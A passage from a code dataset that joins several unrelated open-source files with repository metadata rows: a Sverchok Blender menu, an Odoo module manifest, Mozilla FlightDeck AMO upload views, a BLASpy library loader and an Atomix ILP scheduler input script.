elif isinstance(bl_idname_new_node, list):
# maybe vdmk2 + indexviewer
...
class SvGenericDeligationOperator(bpy.types.Operator):
bl_idname = "node.sv_deligate_operator"
bl_label = "Execute generic code"
fn: bpy.props.StringProperty(default='')
def execute(self, context):
tree = context.space_data.edit_tree
if self.fn == 'vdmk2':
conect_to_3d_viewer(tree)
elif self.fn == 'vdmk2 + idxv':
add_connection(tree, bl_idname_new_node=["SvViewerDrawMk4", "SvIDXViewer28"], offset=[180, 0])
elif self.fn == '+idxv':
add_connection(tree, bl_idname_new_node="SvIDXViewer28", offset=[180, 0])
elif self.fn == 'stethoscope':
add_connection(tree, bl_idname_new_node="SvStethoscopeNodeMK2", offset=[60, 0])
return {'FINISHED'}
class SvNodeviewRClickMenu(bpy.types.Menu):
bl_label = "Right click menu for Sverchok"
bl_idname = "NODEVIEW_MT_sv_rclick_menu"
@classmethod
def poll(cls, context):
tree_type = context.space_data.tree_type
return tree_type in {'SverchCustomTreeType', }
def draw(self, context):
layout = self.layout
layout.operator_context = 'INVOKE_REGION_WIN'
tree = context.space_data.edit_tree
try:
nodes = tree.nodes
except:
layout.operator("node.new_node_tree", text="New Sverchok Node Tree", icon="RNA_ADD")
return
node = valid_active_node(nodes)
if node:
if hasattr(node, "rclick_menu"):
node.rclick_menu(context, layout)
layout.separator()
if len(node.outputs):
layout.menu('SV_MT_AllSocketsOptionsMenu', text='Outputs post-process')
layout.separator()
if node.bl_idname in {'SvViewerDrawMk4', 'SvBmeshViewerNodeMK2'}:
layout.operator("node.sv_deligate_operator", text="Connect IDXViewer").fn = "+idxv"
else:
if has_outputs(node):
layout.operator("node.sv_deligate_operator", text="Connect ViewerDraw").fn = "vdmk2"
if len(node.outputs):
layout.operator("node.sv_deligate_operator", text="Connect stethoscope").fn = "stethoscope"
layout.separator()
if node_supports_presets(node):
layout.menu('SV_MT_LoadPresetMenu', text="Node Presets")
if node and node.bl_idname == 'NodeFrame':
# give options for Frame nodes..
col = layout.column(align=True)
col.prop(node, 'label', text='', icon='NODE')
col.prop(node, 'use_custom_color')
if node.use_custom_color:
col.prop(node, 'color', text='')
col.prop(node, 'label_size', slider=True)
col.prop(node, 'shrink')
layout.separator()
layout.menu("NODEVIEW_MT_Dynamic_Menu", text='node menu')
# layout.operator("node.duplicate_move")
self.draw_conveniences(context, node)
def draw_conveniences(self, context, node):
layout = self.layout
layout.separator()
for nodelist in common_nodes:
for named_node in nodelist:
if named_node == '---':
layout.separator()
else:
draw_add_node_operator(layout, named_node)
def register():
bpy.utils.register_class(SvGenericDeligationOperator)
bpy.utils.register_class(SvNodeviewRClickMenu)
def unregister():
bpy.utils.unregister_class(SvNodeviewRClickMenu)
bpy.utils.unregister_class(SvGenericDeligationOperator)
|
gpl-3.0
| 4,325,409,515,242,083,300
| 36.805882
| 121
| 0.619885
| false
| 3.74643
| false
| false
| false
|
acsone/mozaik
|
mozaik_account/__openerp__.py
|
1
|
1753
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_account, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_account is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_account is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_account.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'MOZAIK: Account',
'version': '1.0.1',
"author": "ACSONE SA/NV",
"maintainer": "ACSONE SA/NV",
"website": "http://www.acsone.eu",
'category': 'Political Association',
'depends': [
'account_accountant',
'account_cancel',
'account_auto_installer',
'mozaik_mandate',
],
'description': """
MOZAIK Account
==============
Manage accounting features
""",
'images': [
],
'data': [
'security/account_security.xml',
'account_view.xml',
],
'qweb': [
],
'demo': [
],
'test': [
],
'license': 'AGPL-3',
'sequence': 150,
'installable': True,
'auto_install': False,
'application': False,
}
|
agpl-3.0
| 5,313,263,469,645,565,000
| 28.216667
| 78
| 0.547633
| false
| 3.794372
| false
| false
| false
|
mozilla/FlightDeck
|
apps/amo/views.py
|
1
|
5070
|
import commonware.log
import simplejson
from django.shortcuts import get_object_or_404 # render_to_response,
from django.http import HttpResponse, HttpResponseBadRequest
from amo import tasks
from amo.constants import STATUS_UPLOAD_FAILED, STATUS_UPLOAD_SCHEDULED
from amo.helpers import get_addon_details as _get_addon_details
from jetpack.models import PackageRevision
#from utils.exceptions import SimpleException
log = commonware.log.getLogger('f.amo')
def upload_to_amo(request, pk):
"""Upload a XPI to AMO
"""
    # check whether this Add-on was already uploaded with the same version name
revision = get_object_or_404(PackageRevision, pk=pk)
version = revision.get_version_name()
uploaded = PackageRevision.objects.filter(
package=revision.package).filter(
amo_version_name=version).exclude(
amo_status=None).exclude(
amo_status=STATUS_UPLOAD_FAILED).exclude(
amo_status=STATUS_UPLOAD_SCHEDULED)
if len(uploaded) > 0:
log.debug("This Add-on was already uploaded using version \"%s\"" % version)
log.debug(revision.amo_status)
return HttpResponseBadRequest("This Add-on was already uploaded using version \"%s\"" % version)
try:
PackageRevision.objects.get(
package=revision.package, amo_version_name=version,
amo_status=STATUS_UPLOAD_SCHEDULED)
except PackageRevision.DoesNotExist:
pass
else:
log.debug("This Add-on is currently scheduled to upload")
return HttpResponseBadRequest("This Add-on is currently scheduled to upload")
log.debug('AMOOAUTH: Scheduling upload to AMO')
tasks.upload_to_amo.delay(pk)
return HttpResponse('{"delayed": true}')
def get_addon_details_from_amo(request, pk):
""" Finds latest revision uploaded to AMO and pulls metadata from AMO
using `generic AMO API <https://developer.mozilla.org/en/addons.mozilla.org_%28AMO%29_API_Developers%27_Guide/The_generic_AMO_API>`_
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package is synced with the AMO and last update was successful
if (not revision.package.amo_id
or revision.amo_status == STATUS_UPLOAD_FAILED):
        return HttpResponse('{}')  # mimetype="application/json"
# pull info
amo_meta = _get_addon_details(revision.package.amo_id,
revision.amo_file_id)
if 'deleted' in amo_meta:
# remove info about the amo_addon from Package
revision.package.amo_id = None
revision.package.amo_slug = None
revision.package.latest_uploaded = None
revision.package.save()
# remove info about uploads from revisions
revisions = revision.package.revisions.all()
for r in revisions:
r.amo_status = None
r.amo_version_name = None
r.amo_file_id = None
super(PackageRevision, r).save()
return HttpResponse(simplejson.dumps(amo_meta))
# update amo package data
amo_slug = amo_meta.get('slug', None)
if (amo_slug and
(not revision.package.amo_slug
or revision.package.amo_slug != amo_slug)):
revision.package.amo_slug = amo_slug
revision.package.save()
if amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
# update amo revision data
if ('version' in amo_meta
and amo_meta['version'] == revision.amo_version_name):
revision.amo_status = int(amo_meta['status_code'])
super(PackageRevision, revision).save()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
def get_addon_details(request, pk):
"""Provide currently stored AMO Status (without contacting to AMO)
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package was scheduled for upload
    if revision.amo_status is None:
return HttpResponse('{}', mimetype="application/json")
amo_meta = {'status': revision.get_status_name(),
'status_code': revision.amo_status,
'version': revision.amo_version_name,
'get_addon_info_url': revision.get_status_url(),
'pk': revision.pk,
'uploaded': revision.amo_status != STATUS_UPLOAD_FAILED}
if revision.package.amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
|
bsd-3-clause
| -3,445,110,804,472,861,000
| 39.56
| 136
| 0.657791
| false
| 3.912037
| false
| false
| false
|
nicholas-moreles/blaspy
|
blaspy/config.py
|
1
|
1951
|
"""
Copyright (c) 2014-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from .errors import raise_blas_os_error
from ctypes import cdll
from os import chdir, path
from platform import system
from struct import calcsize
# The name of the BLAS .so or .dll file. By default this is the OpenBLAS reference
# implementation bundled with BLASpy. Only modify if you wish to use a different version of BLAS
# or if your operating system is not supported by BLASpy out of the box.
BLAS_NAME = "" # default is ""
# True if the BLAS .so or .dll file is in the blaspy/lib subdirectory,
# False if Python should search for it.
IN_BLASPY_SUBDIRECTORY = True # default is True
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
# find the appropriate BLAS to use
if BLAS_NAME == "": # try to use included OpenBLAS
PREPEND = str(path.dirname(__file__))[:-6] + "lib/"
if system() == "Windows":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-win64-int32.dll"
chdir(PREPEND + "win64")
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-win32.dll"
chdir(PREPEND + "win32")
PREPEND = ""
elif system() == "Linux":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-linux64.so"
PREPEND += "linux64/"
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-linux32.so"
PREPEND += "linux32/"
else: # no appropriate OpenBLAS included, BLAS_NAME_OVERRIDE must be used
raise_blas_os_error()
else:
PREPEND = ""
# Change the directory and load the library
_libblas = cdll.LoadLibrary(PREPEND + BLAS_NAME)
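# Minimal sketch of calling into the loaded library via ctypes. cblas_ddot
# is used as an illustrative symbol and is assumed to be exported by the
# bundled OpenBLAS build:
#
#     from ctypes import c_double, c_int, POINTER
#     _libblas.cblas_ddot.restype = c_double
#     _libblas.cblas_ddot.argtypes = [c_int, POINTER(c_double), c_int,
#                                     POINTER(c_double), c_int]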
|
bsd-3-clause
| -4,852,845,395,253,406,000
| 34.490909
| 96
| 0.627883
| false
| 3.358003
| false
| false
| false
|
manub686/atomix
|
r1cmplr/lpinput.py
|
1
|
19222
|
#!/usr/bin/env python
'''
Atomix project, lpinput.py, (TODO: summary)
Copyright (c) 2015 Stanford University
Released under the Apache License v2.0. See the LICENSE file for details.
Author(s): Manu Bansal
'''
import numpy as np
import sys
def main():
inpfile = sys.argv[1]
(inp, out) = lpinput(inpfile)
print inp
print out
def lpinput(inpfile):
#[inp, opt] = example();
#[inp, opt] = example1();
#[inp, opt] = example2();
#[inp, opt] = wifi_6mbps_steady_state();
#[inp, opt] = wifi_54mbps_steady_state();
(inp, opt) = new_flowgraphs(inpfile);
return (inp, opt)
def new_flowgraphs(inpfile):
opt = {}
inp = {}
#problem = 'wifi_54mbps_split';
#opt["lpoutfile"] = problem + '.lp';
opt["minimize_makespan"] = 1;
opt["constraints_no_overbook"] = 1;
opt["constraints_communication_allowance"] = 1;
opt["extra_information_zero_y_i_j"] = 0;
opt["relaxation_x_not_integer"] = 1;
opt["constant_scale_down_factor"] = 1;
# d = 12000; #deadline
D = 100000000; #"infinity" equivalent in expressing the ILP
#run(['wifi_schedule_data/' problem '.m']);
modname = inpfile.split('.py')[0]
print modname
mod = __import__(modname)
(p,G,q, dl,T) = mod.model(D)
print("DEADLINE = %d"%dl)
d = dl ## State Deadline
#n = size(p, 1);
#m = size(p, 2);
n = p.shape[0]; #number of jobs to schedule
m = p.shape[1]; #number of processors
print n, m
#raw_input()
  # Communication costs between different processors (for some fixed transfer size): {qij}, 1 <= i <= m, 1 <= j <= m
#cpu2viterbi = 100;
#cpu2cpu = 1000;
# FIFO transfer time on same processor
#singular_fifo_transfer_time = 200;
#q = D*np.ones((m,m), dtype=np.int);
#for ii in range(4):
# for jj in range(4):
# if ii == jj:
# q[ii][jj] = singular_fifo_transfer_time;
# else:
# q[ii][jj] = cpu2cpu;
#for ii in range(4):
#for jj in range(3,9):
# for jj in range(4,8):
# q[ii][jj] = cpu2viterbi;
# q[jj][ii] = cpu2viterbi;
print
print "q matrix:"
print q
inp["n"] = n;
inp["d"] = d;
inp["D"] = D;
inp["G"] = G;
inp["m"] = m;
inp["p"] = p;
inp["q"] = q;
inp["T"] = T
return (inp, opt)
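# The input file is imported as a module and must expose a model(D) function
# returning (p, G, q, deadline, T). A minimal hypothetical sketch (not one of
# the shipped WiFi models):
#
#   import numpy as np
#   def model(D):
#       p = np.array([[200, D], [400, D]])  # job-on-processor compute times
#       G = np.array([[1, 2]])              # precedence edge: job 1 -> job 2
#       q = np.array([[0, 100], [100, 0]])  # inter-processor transfer costs
#       return (p, G, q, 1000, {})          # T is left empty in this sketch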
#function [inp, opt] = example1()
# opt["lpoutfile"] = 'example1.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 4; d = 20000; G = [ 1,2; 2,3; 3,4];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 <= i <= n, 1 <= j <= m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ]
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 <= i <= m, 1 <= j <= m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#function [inp, opt] = example2()
# opt["lpoutfile"] = 'example2.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 8; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8];
# %n = 7; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 <= i <= n, 1 <= j <= m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 <= i <= m, 1 <= j <= m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_BpskFromYhstar,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 9 <mid decode happens on the VCP>
#%
#% 10 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 12 kFunctionUids_DescramblerWifi_Descramble,
#% 13 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9 -> 10 -> 11 -> 12 -> 13
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100,
#% 9: 4000 (vcp), D (cpu)
#% 10: 100, 11: 200, 12: 100, 13: 100
#
#function [inp, opt] = wifi_6mbps_steady_state()
# opt["lpoutfile"] = 'wifi_6mbps_steady_state.lp';
# opt["minimize_makespan"] = 0;
# %opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 <= i <= n, 1 <= j <= m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 <= i <= m, 1 <= j <= m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#function [inp, opt] = wifi_9mbps_steady_state()
#
#end
#
#function [inp, opt] = example()
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# opt["constant_scale_down_factor"] = 1;
# %opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% d = 4800
#% D = 5000
#
#% d = 9600
#% D = 10000
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
#% n = 10 %number of jobs in the compute graph G
#%
#%
#%
#% G = [...
#% 1, 2;...
#% 2, 3;...
#% 3, 4;...
#% ...
#% 4, 5;...
#% 5, 6;...
#% ...
#% 4, 7;...
#% 7, 8;...
#% 8, 9;...
#% ...
#% 6, 10;...
#% 9, 10;...
#% ]
#
#
# %n = 10; d = 12000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,10; 9,10;]
# %n = 9; d = 9000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# n = 9; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# %n = 8; d = 4800; G = [1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8;]
# %n = 5; d = 2400; G = [ 1,2; 2,3; 3,4; 4,5; ]
#
# %G = randomDirectedGraph(n)
#
# D = d + 100;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 <= i <= n, 1 <= j <= m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, 200, 200;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 300, 300, 300, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 <= i <= m, 1 <= j <= m
#% q = [...
#% 0, 100, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 0, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 100 0, 50, 50, 50, 50, 50, 50;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% ]
#
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_64qamTable,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#%
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 9 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 10 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 12 <mid decode happens on the VCP>
#% 13 <mid decode happens on the VCP>
#% 14 <mid decode happens on the VCP>
#% 15 <mid decode happens on the VCP>
#%
#% 16 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 17 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 18 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 19 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#
#% 20 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 21 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 22 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 23 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#
#% 24 kFunctionUids_DescramblerWifi_Descramble,
#% 25 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7
#% 7 -> 8 -> 12 -> 16 -> 20
#% 7 -> 9 -> 13 -> 17 -> 21
#% 7 -> 10 -> 14 -> 18 -> 22
#% 7 -> 11 -> 15 -> 19 -> 23
#% 20 -> 24
#% 21 -> 24
#% 22 -> 24
#% 23 -> 24
#% 24 -> 25
#
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100, 9: 100, 10:100, 11:100
#% 12, 13, 14, 15: 4000 (vcp), D (cpu)
#% 16, 17, 18, 19: 100
#% 20, 21, 22, 23: 200
#% 24: 100, 25: 100
#
#
#function [inp, opt] = wifi_54mbps_steady_state()
# opt["lpoutfile"] = 'wifi_54mbps_steady_state.lp';
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 15000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# n = 25; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# 7,8; 8,12; 12,16; 16,20;...
# 7,9; 9,13; 13,17; 17,21;...
# 7,10; 10,14; 14,18; 18,22;...
# 7,11; 11,15; 15,19; 19,23;...
# 20,24;...
# 21,24;...
# 22,24;...
# 23,24;...
# 24,25;...
# ];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 <= i <= n, 1 <= j <= m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
